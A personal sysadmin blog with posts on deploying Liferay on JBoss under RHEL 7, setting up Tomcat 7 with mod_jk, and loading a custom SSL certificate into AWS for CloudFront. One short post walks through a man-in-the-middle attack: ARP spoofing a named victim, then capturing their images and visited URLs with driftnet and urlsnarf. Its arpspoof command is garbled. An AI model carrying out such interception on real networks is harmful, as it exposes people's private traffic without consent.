Wednesday, December 30, 2015

Liferay bundle with jboss + RHEL 7

This is the instruction on how to install jboss on Redhat Enterprise Linux 7 (RHEL 7)

you can signup and download Liferay from
https://www.liferay.com/downloads/liferay-portal/available-releases

for my case, i created /opt
and unzip the zip file into it
# unzip liferay-portal-jboss-6.2-ee-sp14-20151105114451508.zip

before we start anything, i had manual downloaded Java JDK 7 release 79 and install it
http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html

once you extract out liferay, please try to run it to confirm the file you download is working
# cd /opt/<Liferay>/<jboss-version>/bin
# ./standalone.sh

you can test it by access 127.0.0.1:8080 with browser
by default, standalone is listen to 127.0.0.1 only and if your Linux didnt install with gui, you need to mortify it.
CTRL + C to stop the jboss

# cd ..
# cd standalone/configuration/
# vim standalone.xml

----------------  Default  -------------------
    <interfaces>
        <interface name="management">
            <inet-address value="${jboss.bind.address.management:127.0.0.1}"/>
        </interface>
        <interface name="public">
            <inet-address value="${jboss.bind.address:127.0.0.1}"/>
        </interface>
        <interface name="unsecure">
            <inet-address value="${jboss.bind.address.unsecure:127.0.0.1}"/>
        </interface>
    </interfaces>

-------------- Change to -----------------
    <interfaces>
        <interface name="management">
            <inet-address value="${jboss.bind.address.management:<your server ip>}"/>
        </interface>
        <interface name="public">
            <inet-address value="${jboss.bind.address:<your server ip>}"/>
        </interface>
        <interface name="unsecure">
            <inet-address value="${jboss.bind.address.unsecure:<your server ip>}"/>
        </interface>
    </interfaces>

----------------------------------------------

restart the jboss liferay and test again using your <server-IP>:8080
# cd ../../bin/
# ./standalone.sh


----------------  Connecting to MySQL Database  ---------------------
you need to download the mysql connector from
https://www.mysql.com/products/connector/
choose JDBC Driver for MySQL (Connector/J)
extract the file and copy the mysql-connector-java-5.1.38-bin.jar
to this location
/opt/<Liferay-location/<jboss-version>/modules/com/liferay/portal/main/
edit the module.xml
add this under <resource>
<resource-root path="mysql-connector-java-5.1.38-bin.jar" />

example:

        <resources>
                <resource-root path="hsql.jar" />
                <resource-root path="jtds.jar" />
                <resource-root path="mysql-connector-java-5.1.38-bin.jar" />
                <resource-root path="portal-service.jar" />
                <resource-root path="portlet.jar" />
                <resource-root path="postgresql.jar" />
        </resources>

------------------  Configure httpd to divert traffic to Liferay jboss ------------------
Download and install httpd-devel
# yum install httpd-devel

download mod_jk from
https://tomcat.apache.org/download-connectors.cgi
extract it the file, configure, make and make install
it will automatic deploy the mod_jk into your apache

If you encounter error saying
no apache given
no netscape given
configure: error: Cannot find the WebServer

then you need to configure --with-apxs
but before that, find out your apxs location
# find / -iname apxs
# ./configure --with-apxs=/usr/bin/apxs

now go to /etc/httpd/conf.d/
create worker.properties file and put this into it
# vim worker.properties

worker.list=worker1,node1,status
worker.jkstatus.type=status

#node1
worker.node1.port=8009
worker.node1.host=172.20.17.64
worker.node1.type=ajp13
worker.node1.lbfactor=1
worker.node1.ping_mode=A

# Load-balancing behaviour
worker.worker1.type=lb
worker.worker1.balance_workers=node1
worker.worker1.sticky_session=1


then create mod_jk.conf file and put this into it
# vim mod_jk.conf

LoadModule jk_module modules/mod_jk.so

<IfModule mod_jk.c>
JkWorkersFile /etc/httpd/conf.d/worker.properties
JkShmFile     /var/log/httpd/mod_jk.shm
JkLogFile     /var/log/httpd/mod_jk.log
JkLogLevel    info,debug
JkLogStampFormat "[%a %b %d %H:%M:%S %Y] "

JkMount /* worker1
</IfModule>


Before we start apache, we need to configure the jboss to listen to port 8009 AJP1.3
by default it was disable at standalone.xml

# cd /opt/liferay-portal-6.2-ee-sp14/jboss-7.1.1/standalone/configuration/
# vim standalone.xml

----- default ------
        <subsystem xmlns="urn:jboss:domain:web:1.1" default-virtual-server="default-host" native="false">
            <configuration>
                <jsp-configuration development="true"/>
            </configuration>
            <connector name="http" protocol="HTTP/1.1" scheme="http" socket-binding="http"/>
            <virtual-server name="default-host" enable-welcome-root="false">
                <alias name="localhost"/>
                <alias name="example.com"/>
            </virtual-server>
        </subsystem>

------- change to  --------
        <subsystem xmlns="urn:jboss:domain:web:1.1" default-virtual-server="default-host" native="false">
            <configuration>
                <jsp-configuration development="true"/>
            </configuration>
            <connector name="ajp" protocol="AJP/1.3" scheme="http" socket-binding="ajp"/>
            <virtual-server name="default-host" enable-welcome-root="false">
                <alias name="localhost"/>
                <alias name="example.com"/>
            </virtual-server>
        </subsystem>
-----------------------------

Start jboss and httpd service and test it by accessing your server ip without port 8080
once success to see the pages, now we need to create a startup script

---------- startup --------------

by default, in jboss/bin/init.d directory, it already have the startup script name jboss-as-standalone.sh
If you are using RHEL 6 or before, you can just make a symlink from /etc/init.d/jboss and point to this file
for RHEL7, it a bit tricky since it use systemd

but before that, edit the jboss-as-standalone.sh and define the 
JBOSS_CONF="/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as.conf"
JBOSS_HOME=/opt/<liferay-location>/<jboss-ver>

then go to /usr/lib/systemd/system
create jboss.service file and put this

[Unit]
Description=Jboss Application Server
After=syslog.target
After=network.target


[Service]
Type=forking
PIDFile=/var/run/jboss-as/jboss-as-standalone.pid
ExecStart=/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as-standalone.sh start
ExecStop=/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as-standalone.sh stop
TimeoutStartSec=300
TimeoutStopSec=300


[Install]
WantedBy=multi-user.target


then go to /etc/systemd/system/multi-user.target.wants and create symlink point to the file just now
then enable this for startup list
# systemctl enable jboss.service




Monday, August 10, 2015

man in the middle - hacking

use netdiscover to find out ip if uncertain which IP range it use
use nmap to find out more info
# nmap 172.20.1.30
or
# nmap 172.20.1.1/24

used command
Arpspoof
Driftnet

setup port forwarding
Change the value in your /proc/sys/net/ipv4/ip_forward from 0 to 1 - See more at: http://www.hacking-tutorial.com/tips-and-trick/how-to-set-up-port-forwarding-in-linux-and-windows/#sthash.YQIMORR4.dpuf




Victim IP address : 192.168.8.90

Attacker network interface : eth0; with IP address : 192.168.8.93

Router IP address : 192.168.8.8

And then setting up arpspoof from to capture all packet from router to victim.
# 168.8.90 192.168.8.8

After step three and four, now all the packet sent or received by victim should be going through attacker machine.
Now we can try to use driftnet to monitor all victim image traffic. According to its website,
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
to run driftnet, we just run this
# driftnet -i eth0

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal

For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code
# urlsnarf -i eth0

and urlsnarf will start capturing all website address visited by victim machine.

When victim browse a website, attacker will know the address victim visited.

Wednesday, July 8, 2015

tomcat 7 setup guide

Tomcat Setup guide
this setup was done on centos 7

Tomcat 7
This is my own setup guide for my server.
you can change according to your need

Choose “Core” -> tar.gz to download

Tomcat 7.0 is designed to run on Java SE 6 and later. So download the appropriate version
For more info, you can Read the RELEASE-NOTES and the RUNNING.txt file in the distribution for more details.

For easy installation, I download rpm and use localinstall from Oracle website
# yum localinstall jdk-7u80-linux-x64.rpm



Installation
1      Extract the file and put it at /opt

# tar -zxvf apache-tomcat-7.0.62.tar.gz



2   Install tomcat native

# cd /opt/apache-tomcat-7.0.62/bin
# tar -zxvf tomcat-native.tar.gz
# cd tomcat-native-1.1.33-src/jni/native


Build tc-native requires three components to be installed:
- APR library
- OpenSSL libraries
- Java SE Development Kit (JDK)
# yum install apr-devel openssl-devel

Now proceed to install the native using this command

# ./configure --with-apr=/usr/bin/apr-1-config --with-java-home=/usr/java/jdk1.7.0_80/ --with-ssl=yes --prefix=/usr

p/s:- Update the java location accordingly

3    Install common-daemon-native

# cd /opt/apache-tomcat-7.0.62/bin
# tar –zxvf commons-daemon-native.tar.gz
# cd commons-daemon-1.0.15-native-src/unix
# ./configure
# cp jsvc ../..


Tuning
      Edit /opt/apache-tomcat-7.0.62/conf/server.xml
Search connectionTimeout and change the value to 600000
Search maxThreads and change the value to 500 (if got enable)

2       Edit /conf/context.xml
Change all <Context>
To <Context swallowOutput="true">
( it is use to redirect system err to catalina)

3       Edit conf/logging.properties, and add this
1catalina.org.apache.juli.AsyncFileHandler.rotatable = true
( it is use to rotate the log)

      Create setenv.sh at bin directory and add this into it
---------------------------------------------------------------------------------------------------
JAVA_OPTS="-Xms4096m -Xmx4096m -XX:MaxPermSize=512m -Dorg.jboss.resolver.warning=true -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 -Dsun.lang.ClassLoader.allowArraySyntax=true -Dhttp.maxConnections=500 -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode"

# Set the -Xms and -Xmx the same, around 50% to 80% of total memory
# Set the PermSize to either 256 or 512, increase it if there’s OutOfMemoryError PermGen space in log

# to see gc memory, add "-XX:+PrintGCDetails -XX:+PrintGCTimeStamps -verbose:gc -Xloggc:/tmp/gc.log"
---------------------------------------------------------------------------------------------------
Startup script

# vim /etc/init.d/tomcat

#!/bin/sh
#
# Tomcat startup script
#
# chkconfig: - 85 15
# description: Tomcat Server
# processname: tomcat
#
# To use this script run it as root - it will switch to the specified user
#
# Either modify this script for your requirements or just ensure that
# the following variables are set correctly before calling the script.

#define where tomcat is - this is the directory containing directories log, bin, conf etc
CATALINA_HOME=${CATALINA_HOME:-"/opt/tomcat"}
export CATALINA_HOME

#define the user under which jboss will run, or use 'RUNASIS' to run as the current user
TOMCAT_USER=${TOMCAT_USER:-"tomcat"}
export TOMCAT_USER

#make sure java is in your path
JAVA_HOME=${JAVA_HOME:-"/usr/java/jdk"}
export JAVA_HOME


case "$1" in
start)
    $CATALINA_HOME/bin/daemon.sh start
    ;;
stop)
    $CATALINA_HOME/bin/daemon.sh stop
    rm -rf $TOMCAT_HOME/work/*
    ;;
restart)
    $0 stop
    i=0
    while [ `ps ax|grep -v grep|grep jsvc|wc -l` -gt 0 -a $i -lt 60 ]
    do
     sleep 1
     (( i += 1 ))
    done
    /usr/bin/killall -9 jsvc
    $0 start
    ;;
*)
    echo "usage: $0 (start|stop|restart|help)"
esac



edit the java location and tomcat location
then change its permission

# chmod 755 /etc/init.d/tomcat
then create tomcat user

# useradd –s /sbin/nologin tomcat

Change tomcat permission to tomcat

# chown -R tomcat:tomcat apache-tomcat-7.0.62



Add to startup list

# chkconfig --add tomcat

# chkconfig --level 2345 tomcat on


Connect to mysql



Get the JDBC driver and put to lib
http://www.mysql.com/products/connector/

Edit conf/context.xml
Add under <Context swallowOutput="true">
Below is the example format

--------------------------------------------------------------------------------------------------------------
<Resource name="jdbc/TestDB" auth="Container" type="javax.sql.DataSource"
maxActive="100" maxIdle="30" maxWait="10000"
username="javauser" password="javadude" driverClassName="com.mysql.jdbc.Driver"
url="jdbc:mysql://localhost:3306/javatest"/>

--------------------------------------------------------------------------------------------------------------

change the word in red accordingly

maxActive = Maximum number of database connections in pool. Make sure you configure your.
mysqld max_connections large enough to handle all of your db connections. Set to -1 for no limit.
maxIdle = Maximum number of idle database connections to retain in pool. Set to -1 for no limit.
maxWait = Maximum time to wait for a database connection to become available in ms, An Exception is thrown if this timeout is exceeded. Set to -1 to wait indefinitely.


Apache

Install apache and fine tune it


1. Install MOD_JK connector

# yum install httpd-devel

Go to https://tomcat.apache.org/download-connectors.cgi and download the source
Configure, make and make install
copy binary file to /etc/http/modules

p/s = if got error saying "error: Cannot find the WebServer"
use this function to find apxs
# find / -iname apxs
then install using this command
# configure --with-apxs=/usr/bin/apxs

# chmod 755 /etc/httpd/modules/mod_jk.so


Create workers.properties
Change the node name according to the same as the servers name. If you follow the startup, location is define in mod_jk.conf

--------------------------------------------------------------------------------------------------------------------
worker.list=worker1,node1,node2,status #node name you want to use add this in server.xml
worker.jkstatus.type=status

#node1
worker.node1.port=8009
worker.node1.host=10.0.3.129
worker.node1.type=ajp13
worker.node1.lbfactor=1
worker.node1.ping_mode=A
#worker.node1.cachesize=10

#node2
worker.node2.port=8009
worker.node2.host=10.0.3.130
worker.node2.type=ajp13
worker.node2.lbfactor=3
worker.node2.ping_mode=A
#worker.node2.cachesize=10

# Load-balancing behaviour
worker.worker1.type=lb
worker.worker1.balance_workers=node1,node2
worker.worker1.sticky_session=1

--------------------------------------------------------------------------------------------------------------------


Create mod_jk.conf

-------------------------------------------------------------------------------------------------------------------
LoadModule jk_module modules/mod_jk.so

<IfModule mod_jk.c>
JkWorkersFile /data/sys/etc/httpd/workers.properties
JkShmFile /var/log/httpd/mod_jk.shm
JkLogFile /var/log/httpd/mod_jk.log
JkLogLevel info,debug
JkLogStampFormat "[%a %b %d %H:%M:%S %Y] "


JkMount /app/* worker1 #mount this url, edit as neccessary
# DO NOT MOUNT EVERYTHING!
</IfModule>
------------------------------------------------------------------------------------------------------------------

Thursday, February 12, 2015

Amazon AWS CloudFront setup Custom SSL Certificate

Here i will show how i enable the custom ssl certificate option in CloudFront.

SSL cert preparation
there are few things you need to prepare:-
1. Private key (.pem)
2. public key (.pem)
3. certificate chain file (.pem)

If you have yours private.key & public.crt from CA,
you can use below command to change it to .pem format

openssl rsa -in Private.key -text > Private.pem

openssl x509 -inform PEM -in Public.crt > Public.pem

For the Certificate Chain file,
once you deploy your SSL cert to your server/web
you can use this link to check how is the chain file look like as different provider have different chain
https://ssltools.thawte.com/checker/views/certCheck.jsp

Example 1


For Facebook, there is only 1 Intermediate Cert in chain


Example 2


For this one, it got 2 intermediate cert inside the chain


From AWS documentation, the sample certificate chain will be look like this

-----BEGIN CERTIFICATE-----
Intermediate certificate 2
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
Intermediate certificate 1
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
Optional: Root certificate
-----END CERTIFICATE-----


So after you check hows your certificate chain look like,
all you need is find that cert and combine it

for example 1 which is Facebook, it only got 1 intermediate cert in chain and thus DigiCert High Assurance CA-3 can directly use as certificate chain

for example 2 which is Gardenbythebay, it got 2 intermediate cert in the chain, then you need to copy and paste follow the sequence like below and save it as certificate_chain.pem 

-----BEGIN CERTIFICATE-----
< Thawte SSL CA - G2 >
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
< thawte Primary Root CA >
-----END CERTIFICATE-----

NOTE, 
I am using Thawte as well, so here i provide the link for the both intermediate cert 
Thawte SSL CA - G2
Thawte Primary Root CA


Upload into the IAM store

Now you have all 3 file you needed, is time to upload it to the IAM store
I just go to EC2 and launch a micro instance for this purpose.
please choose Amazon linux as your instance for this because it already install with the amazon command. If you use other distro, you need to manual install


1. once you done launch your amazon instance, upload all 3 file into the server.
FOR WINDOWS, you can use winscp to upload, but before that, please go to /etc/sshd_config and enable password authentication and reload the service


2. use this command to upload your file
aws iam upload-server-certificate --server-certificate-name CertificateName --certificate-body file://public_key_certificate_file --private-key file://privatekey.pem --certificate-chain file://certificate_chain_file --path /cloudfront/path/

example:
aws iam upload-server-certificate --server-certificate-name Facebook2015 --certificate-body file://~/Public.pem --private-key file://~/Private.pem --certificate-chain file://~/certificate_chain.pem --path /cloudfront/Facebook/

once done, you should see something like this as output

{

  "ServerCertificateMetadata": {
     "ServerCertificateId": "ASCAJR5WQNL4PIB4GMMNE",
     "ServerCertificateName": "Facebook2015",
     "Expiration": "2017-04-23T23:59:59Z",
     "Path": "/cloudfront/Facebook/",
     "Arn": "arn:aws:iam::337660227660:server-certificate/cloudfront/Facebook/Facebook2015",
     "UploadDate": "2015-02-11T03:36:56.032Z"
  } 
}

Now you should be able to choose custom SSL at your CLoudFront


OTHER COMMAND

delete certificate object:

aws iam delete-server-certificate --server-certificate-name certificate_object_name

example:
aws iam delete-server-certificate --server-certificate-name Facebook2015


View Certificate object:

aws iam get-server-certificate --server-certificate-name certificate_object_name

example:
aws iam get-server-certificate --server-certificate-name Facebook2015